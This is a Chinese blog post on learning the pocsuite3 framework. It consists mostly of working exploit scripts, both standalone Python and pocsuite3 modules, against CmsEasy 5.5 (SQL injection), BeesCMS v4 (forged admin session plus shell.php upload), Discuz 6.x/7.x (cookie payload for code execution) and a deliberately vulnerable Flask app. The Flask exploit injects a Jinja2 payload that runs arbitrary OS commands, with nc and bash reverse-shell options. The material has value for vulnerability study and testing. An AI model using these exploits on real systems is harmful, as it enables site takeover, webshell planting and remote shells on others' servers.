• pocsuite3框架学习


    0x01 CmsEasy 5.5 UTF-8注入

    无框架poc

    import requests
    import sys
    
    def verify(url):
        path = '/celive/live/header.php'
        target = url+path
        post = {
            "xajax":"LiveMessage",
            "xajaxargs[0][name]":"1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(select 'hello' from cmseasy_user where groupid=2 limit 1))a from information_schema.tables group by a)b),'','','','1','127.0.0.1','2')#"
        }
        try:
            res = requests.post(target,post)
    
            if 'hello' in res.text:
                print("[+]%s is vulnerable" % url)
            else:
                print("[-]%s is not vulnerable" % url)
        except Exception as e:
            print('error!')
    
    if __name__ == '__main__':
        args = sys.argv
        if len(args) == 2:
            url = args[1]
            verify(url)
        else:
            print("Usage: python %s url" % args[0])
    
    

    pocsuite3

    from pocsuite3.api import Output,POCBase,register_poc,requests
    class CmsEasy(POCBase):
        vulID = '1000'
        version = '1.0'
        author = ['一寸一叶']
        vulDate = '2014'
        createDate = '2020-11-20'
        updateDate = '2020-11-20'
        references = 'https://www.seebug.org/vuldb/ssvid-94004'
        name = 'CMSEasy 5.5 /celive/live/header.php SQL注入漏洞'
        appPowerLink = 'http://www.cmseasy.cn/'  # 漏洞产商主页
        appName = 'CMSEasy'  # 漏洞应用名称
        appVersion = '5.5'  # 漏洞影响版本
        vulType = 'SQL Injection'  # 漏洞类型
        desc = '''/celive/live/header.php存在post注入'''  # 在漏洞描述填写
        samples = []  # 测试成功网址
        install_requires = []  # PoC依赖的第三方模块,尽量不要使用第三方模块,必要时参考后面给出的参考链接
        pocDesc = '''PoC用法描述'''  # 在PoC用法描述填写
    
        def _verify(self):
            result = {}
            target = self.url + '/celive/live/header.php'
            payload = {
                "xajax": "LiveMessage",
                "xajaxargs[0][name]": "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(select 'hello' from cmseasy_user where groupid=2 limit 1))a from information_schema.tables group by a)b),'','','','1','127.0.0.1','2')#"
            }
            res = requests.post(target,payload)
            if 'hello' in str(res.content):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target
                result['VerifyInfo']['Postdata'] = payload
            return self.parse_output(result)
    
        def _attack(self):
            return self._verify()
        def parse_output(self,result):
            output = Output(self)
            if result:
                output.success(result)
            else:
                output.fail('target is not vulnerable')
            return result
    register_poc(CmsEasy)
    
    

    0x02 BeesCMS v4后台getshell

    无框架

    import requests
    import sys,re
    
    def verity(url):
        if 'index.php' in url:
            attack_url = url.replace('index.php','admin/upload.php')
        else:
            attack_url = url+'/admin/upload.php'
    
        get_cookie = {
            '_SESSION[login_in]':'1',
            '_SESSION[admin]':'1',
            '_SESSION[login_time]':'99999999999'
        }
        try:
            res = requests.post(url,get_cookie)
            cookie = res.cookies['PHPSESSID']
            if cookie:
                print('成功获取cookie:%s' %cookie)
                payload = {
                    'up':(
                        'shell.php',
                        '<?php phpinfo();?>',
                        'image/png',
                    ),
                }
                attack_cookie = {'PHPSESSID':cookie}
                res = requests.post(attack_url,cookies=attack_cookie,files=payload)
                if '.php' in res.text:
                    print("[+]%s is vulnerable" % url)
                    if 'img' in res.text:
                        compile = re.compile(r'img/.*php')
                        result = compile.findall(res.text)
                        for i in result:
                            print("[+]上传测试路径为:%s"%i)
                else:
                    print("[+]%s is not vulnerable" % url)
            else:
                print('获取cookie失败')
        except Exception as e:
            print('error!')
    
    if __name__ == '__main__':
        args = sys.argv
        if len(args) == 2:
            url = args[1]
            verity(url)
        else:
            print("python %s url 
    Example: python %s http://127.0.0.1" %(args[0],args[0]))
    
    

    pocsuite3

    from pocsuite3.api import Output,POCBase,register_poc,requests
    class BeeCMS(POCBase):
        vulID = '1001'
        version = '1.0'
        author = ['一寸一叶']
        vulDate = '2014'
        createDate = '2020-11-20'
        updateDate = '2020-11-20'
        references = 'https://bbs.ichunqiu.com/thread-13977-1-1.html'
        name = 'BeeCMS v4 后台上传getshell'
        appPowerLink = 'http://www.beescms.com/'  # 漏洞产商主页
        appName = 'BeeCMS'  # 漏洞应用名称
        appVersion = 'v4'  # 漏洞影响版本
        vulType = 'Upload'  # 漏洞类型
        desc = '''/admin/upload.php任意文件上传'''  # 在漏洞描述填写
        samples = []  # 测试成功网址
        install_requires = []  # PoC依赖的第三方模块,尽量不要使用第三方模块,必要时参考后面给出的参考链接
        pocDesc = '''PoC用法描述'''  # 在PoC用法描述填写
    
        def _verify(self):
            result = {}
            if 'index.php' in self.url:
                attack_url = self.url.replace('index.php', 'admin/upload.php')
            else:
                attack_url = self.url + '/admin/upload.php'
    
            #获取cookie
            get_cookie = {
                '_SESSION[login_in]': '1',
                '_SESSION[admin]': '1',
                '_SESSION[login_time]': '99999999999'
            }
            res = requests.post(self.url, get_cookie)
            cookie = res.cookies['PHPSESSID']
            if cookie:
                print('成功获取cookie:%s' % cookie)
                payload = {
                    'up': (
                        'shell.php',
                        '<?php phpinfo();?>',
                        'image/png',
                    ),
                }
                attack_cookie = {'PHPSESSID': cookie}
                res = requests.post(attack_url, cookies=attack_cookie, files=payload)
                if '.php' in res.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = attack_url
                    result['VerifyInfo']['Postdata'] = payload
                return self.parse_output(result)
    
            def _attack(self):
                return self._verify()
    
        def parse_output(self, result):
            output = Output(self)
            if result:
                output.success(result)
            else:
                output.fail('target is not vulnerable')
            return result
    register_poc(BeeCMS)
    

    0x03 Discuz 7.x 6.x rce

    找到任意一篇文章

    刷新bp抓包,将Cookie内的内容修改为:

    GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
    

    无框架

    import requests,sys
    
    def verify(url):
        headers = {
            'Cookie':'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();'
        }
        res = requests.get(url,headers=headers)
        print(res.text)
        if 'phpinfo()' in res.text:
            print("[+]%s is vulnerable" % url)
        else:
            print("[+]%s is not vulnerable" % url)
    
    if __name__ == '__main__':
        args = sys.argv
        if len(args) == 2:
            url = args[1]
            verify(url)
        else:
            print("Usage:python %s url <任意一篇文章地址>" %args[0])
    

    pocsuite3

    from pocsuite3.api import Output,POCBase,register_poc,requests
    class Discuz(POCBase):
        vulID = '1002'
        version = '1.0'
        author = ['一寸一叶']
        vulDate = '2010'
        createDate = '2020-11-20'
        updateDate = '2020-11-20'
        references = 'https://www.cnblogs.com/yicunyiye/p/14011986.html'
        name = 'Discuz 6.x 7.x rce (wooyun-2010-080723)'
        appPowerLink = 'https://www.discuz.net/forum.php'  # 漏洞产商主页
        appName = 'Discuz'  # 漏洞应用名称
        appVersion = '6.x 7.x'  # 漏洞影响版本
        vulType = 'RCE'  # 漏洞类型
        desc = '''任意一篇文章处修改cookie为:GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();可以命令执行'''  # 在漏洞描述填写
        samples = []  # 测试成功网址
        install_requires = []  # PoC依赖的第三方模块,尽量不要使用第三方模块,必要时参考后面给出的参考链接
        pocDesc = '''-u 指定的是文章地址'''  # 在PoC用法描述填写
    
        def _verify(self):
            result = {}
            payload = {
                'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();'
            }
            res = requests.get(self.url, headers=payload)
            print(res.text)
            if 'phpinfo()' in res.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Postdata'] = payload
            return self.parse_output(result)
    
        def _attack(self):
            return self._verify()
    
        def parse_output(self, result):
            output = Output(self)
            if result:
                output.success(result)
            else:
                output.fail('target is not vulnerable')
            return result
    
    
    register_poc(Discuz)
    

    0x04 flask注入

    from flask import Flask, request
    from jinja2 import Template
    
    app = Flask(__name__)
    @app.route("/")
    
    def index():
        name = request.args.get('name','guest')
        t = Template("Hello "+ name)
        return t.render()
    
    if __name__ =="__main__":
        app.run()
    

    存在漏洞
    无框架

    import requests,sys
    
    
    def verity(url):
        path = '/?name='
        payload = '{{22*22}}'
        target = url+path+payload
        res = requests.get(target)
        if '484' in res.text:
            print("[+]%s is vulnerable" % url)
        else:
            print("[+]%s is not vulnerable" % url)
    
    
    if __name__ == '__main__':
        args = sys.argv
        if len(args) == 2:
            url = args[1]
            verity(url)
        else:
            print("Usage: python %s url" % args[0])
    

    pocsuite3 poc

    from pocsuite3.api import POCBase,register_poc,Output,requests
    
    class FlaskInjection(POCBase):
        vulID = '1003'
        version = '1.1'
        author = ['一寸一叶']
        vulDate = '1.1'
        createDate = '2020/11/21'
        updateDate = '2020/11/21'
        references = ['flask']
        name = 'flask-poc'
        appPowerLink = 'flask'
        appName = 'flask'
        appVersion = 'flask'
        desc = '''
            flask注入
        '''
        samples = []
    
        def _verify(self):
            result = {}
            path = '/?name='
            payload = '{{22*22}}'
            target = self.url+path+payload
            res = requests.get(target)
            if res.status_code == 200 and '484' in res.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['payload'] = payload
            return self.parse_output(result)
    
        def _attack(self):
            return self._verify()
    
        def parse_output(self,result):
            output = Output(self)
            if result:
                output.success(result)
            else:
                output.fail('target is not vulnerable')
            return result
    register_poc(FlaskInjection)
    
    

    pocsuite3 exp

    from pocsuite3.api import POCBase,register_poc,Output,requests,OptDict,REVERSE_PAYLOAD
    from collections import OrderedDict
    
    class FlaskInjection(POCBase):
        vulID = '1003'
        version = '1.1'
        author = ['一寸一叶']
        vulDate = '1.1'
        createDate = '2020/11/21'
        updateDate = '2020/11/21'
        references = ['flask']
        name = 'flask-poc'
        appPowerLink = 'flask'
        appName = 'flask'
        appVersion = 'flask'
        desc = '''
            flask注入
        '''
        samples = []
    
        def _options(self):
            o = OrderedDict()
            payload = {
                'nc':REVERSE_PAYLOAD.NC,
                'bash':REVERSE_PAYLOAD.BASH,
            }
            o['command'] = OptDict(selected='bash',default=payload)
            return o
    
        def _verify(self):
            result = {}
            path = '/?name='
            payload = '{{22*22}}'
            target = self.url+path+payload
            res = requests.get(target)
            if res.status_code == 200 and '484' in res.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['payload'] = payload
            return self.parse_output(result)
    
        def _attack(self):
            result = {}
            path = '/?name='
            url = self.url+path
            cmd = self.get_option('command')
            payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("' + cmd + '").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
            try:
                res = requests.get(url=url+payload)
                data = res.text
                data = data.replace('
    ','').replace('
    ','')
                print(data)
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Name'] = payload
            except Exception as e:
                return
            return self.parse_output(result)
    
    
        def parse_output(self,result):
            output = Output(self)
            if result:
                output.success(result)
            else:
                output.fail('target is not vulnerable')
            return result
    register_poc(FlaskInjection)
    
  • 相关阅读:
    产品 | What's产品经理
    产品 | 互联网+“加油”
    微信小程序 | 未来O2O电商的“阴谋”
    推荐书籍 | 产品必备书籍
    iOS | NSProxy
    iOS | 解决中文乱码
    HTML DOM addEventListener() 方法
    给每个对象加上新的属性
    vue.config.js基础配置
    SEO要点
  • 原文地址:https://www.cnblogs.com/yicunyiye/p/14011986.html
Copyright © 2020-2023  润新知